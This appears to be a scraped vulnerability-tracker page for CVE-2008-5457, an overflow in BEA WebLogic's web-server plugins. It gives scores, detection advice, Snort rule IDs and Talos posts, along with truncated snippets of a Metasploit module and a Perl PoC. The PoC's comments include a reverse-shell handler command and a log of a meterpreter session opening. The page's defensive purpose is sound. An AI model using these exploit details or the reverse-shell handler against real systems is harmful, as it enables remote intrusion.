CVE-2008-5457
published 2009-01-14CVE-2008-5457: Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3…
PriorityP270critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
61.31%
99.0th percentile
Unspecified vulnerability in the Oracle BEA WebLogic Server Plugins for Apache, Sun and IIS web servers component in BEA Product Suite 10.3, 10.0 MP1, 9.2 MP3, 9.1, 9.0, 8.1 SP6, and 7.0 SP7 allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors.
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
| oracle | bea_product_suite | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandPOST /index.jsp HTTP/1.1\r\nHost: localhost\r\nCookie: TAGLINE=IAMMCLOVIN; JSESSIONID=<payload>↗
snort↗
GID 1, SID 15477
snort↗
GID 1, SID 15263
- →The exploit targets the JSESSIONID cookie value — monitor for HTTP requests with abnormally large (thousands of bytes) JSESSIONID cookie values sent to WebLogic-proxied endpoints. ↗
- →The vulnerability is only reachable when WebLogic clustering is configured; scope detection to clustered deployments. ↗
- →The IIS connector variant delivers the oversized payload via the URL query string (?;JSESSIONID=) rather than the Cookie header — inspect both locations. ↗
- →Bad characters in the payload are null byte, CR, LF, space, semicolon, equals, and comma — encoded shellcode in JSESSIONID values will avoid these bytes. ↗
- →The Metasploit exploit uses EXITFUNC=seh, indicating SEH-based exploitation; look for SEH chain overwrites in crash analysis of the WebLogic plugin process. ↗
- →The Perl PoC uses a partial SEH overwrite (2-byte value \x76\x79) following a backward JMP sled — this pattern is detectable in raw HTTP body content. ↗
- ·The vulnerability is only exploitable when WebLogic clustering is configured in the Apache/Sun/IIS plugin; non-clustered deployments are not affected. ↗
- ·Return addresses (ROP gadgets) in the Metasploit module are version-specific to WebLogic plugin DLL builds 1.0.1136334 and 1.0.1150354 on Windows Apache 2.2; other builds will require different offsets. ↗
- ·The Perl PoC was tested only on Windows 2000 SP4 and Windows 2003 R2 SP2 without NX; systems with NX/DEP enabled may not be exploitable via this specific technique. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)
exploitdb·2010-07-03
CVE-2008-5457 BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)
BEA WebLogic - JSESSIONID Cookie Value Overflow (Metasploit)
---
##
# $Id: bea_weblogic_jsessionid.rb 9670 2010-07-03 03:19:07Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'BEA WebLogic JSESSIONID Cookie Value Overflow',
'Description' => %q{
This module exploits a buffer overflow in BEA\'s WebLogic plugin. The vulnerable
code is only accessible when clustering is configured. A request containing a
long JSESSION cookie value can lead to arbirtary code execution.
},
'Author' => 'pusscat',
'Version' => '$Revision: 9670 $',
'Referenc
Exploit-DB
Oracle WebLogic IIS connector JSESSIONID - Remote Overflow
exploitdb·2009-04-01·CVSS 10.0
CVE-2008-5457 [CRITICAL] Oracle WebLogic IIS connector JSESSIONID - Remote Overflow
Oracle WebLogic IIS connector JSESSIONID - Remote Overflow
---
#!/usr/bin/perl
# No point in keeping this private anymore!
#
# k`sOSe - 02/16/2009 - CVE-2008-5457
# Tested on w2k sp4 and w2k3 R2 sp2 (no NX)
#
# cohelet framework-3.2 # ./msfcli multi/handler PAYLOAD=windows/reflectivemeterpreter/reverse_tcp LHOST=10.10.10.1 LPORT=80 E
# [*] Please wait while we load the module tree...
# [*] Handler binding to LHOST 0.0.0.0
# [*] Started reverse handler
# [*] Starting the payload handler...
# [*] Transmitting intermediate stager for over-sized stage...(191 bytes)
# [*] Sending stage (75776 bytes)
# [*] Meterpreter session 1 opened (10.10.10.1:80 -> 10.10.10.4:2171)
#
# meterpreter > rev2self
# meterpreter > execute -i -f cmd.exe
# Process 3092 created.
# Channel 1 created.
# Microsoft Wind
Metasploit
BEA WebLogic JSESSIONID Cookie Value Overflow
metasploit
BEA WebLogic JSESSIONID Cookie Value Overflow
BEA WebLogic JSESSIONID Cookie Value Overflow
This module exploits a buffer overflow in BEA's WebLogic plugin. The vulnerable code is only accessible when clustering is configured. A request containing a long JSESSION cookie value can lead to arbitrary code execution.
Talos
Rule release for today - April 21st 2009
blogs_talos·2009-04-21·CVSS 10.0
CVE-2009-0520 [CRITICAL] Rule release for today - April 21st 2009
A small set of new rules in today's release and a couple of modifications. Here are the highlights:
Adobe Flash Player Buffer Overflow (CVE-2009-0520):
Adobe Flash Player contains a programming error that may allow a remote attacker to execute code on a vulnerable system via a specially crafted flash file.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15478.
Oracle BEA WebLogic Buffer Overflow (CVE-2008-5457):
Oracle BEA WebLogic contains a programming error that may allow a remote attacker to execute code on a vulnerable system.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15477.
A previously released rule identified with GID 1, SID 15263 will a
Talos
Rule release for today - April 21st 2009
blogs_talos·2009-04-21·CVSS 10.0
CVE-2009-0520 [CRITICAL] Rule release for today - April 21st 2009
## Rule release for today - April 21st 2009
A small set of new rules in today's release and a couple of modifications. Here are the highlights:
Adobe Flash Player Buffer Overflow (CVE-2009-0520): Adobe Flash Player contains a programming error that may allow a remote attacker to execute code on a vulnerable system via a specially crafted flash file.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15478.
Oracle BEA WebLogic Buffer Overflow (CVE-2008-5457): Oracle BEA WebLogic contains a programming error that may allow a remote attacker to execute code on a vulnerable system.
A rule to detect attacks targeting this vulnerability is included in this release and is identified with GID 1, SID 15477.
A previously released
Talos
Rule release for today - January 27th 2009
blogs_talos·2009-01-27·CVSS 10.0
CVE-2008-4006 [CRITICAL] Rule release for today - January 27th 2009
## Rule release for today - January 27th 2009
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
Oracle Secure Backup Command Injection (CVE-2008-4006) Oracle BPEL Injection (CVE-2008-4014) Oracle Secure Backup Command Injection (CVE-2008-5440) Oracle Secure Backup Buffer Overflow (CVE-2008-5444) Oracle Secure Backup Command Injection (CVE-2008-5448) Oracle Secure Backup Command Injection (CVE-2008-5449) Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
Talos
Rule release for today - January 27th 2009
blogs_talos·2009-01-27·CVSS 10.0
CVE-2008-4006 [CRITICAL] Rule release for today - January 27th 2009
Large batch of Oracle vulnerabilities today. We've had to work through these carefully as details were pretty scant. Here's what we released:
Oracle Secure Backup Command Injection (CVE-2008-4006)
Oracle BPEL Injection (CVE-2008-4014)
Oracle Secure Backup Command Injection (CVE-2008-5440)
Oracle Secure Backup Buffer Overflow (CVE-2008-5444)
Oracle Secure Backup Command Injection (CVE-2008-5448)
Oracle Secure Backup Command Injection (CVE-2008-5449)
Oracle BEA WebLogic Denial of Service (CVE-2008-5457)
More details can be found here: http://www.snort.org/vrt/advisories/vrt-rules-2009-01-27.html
http://secunia.com/advisories/33526http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.htmlhttp://www.securityfocus.com/bid/33177http://www.securitytracker.com/id?1021571http://www.vupen.com/english/advisories/2009/0115http://secunia.com/advisories/33526http://www.oracle.com/technetwork/topics/security/cpujan2009-097901.htmlhttp://www.securityfocus.com/bid/33177http://www.securitytracker.com/id?1021571http://www.vupen.com/english/advisories/2009/0115
2009-01-14
Published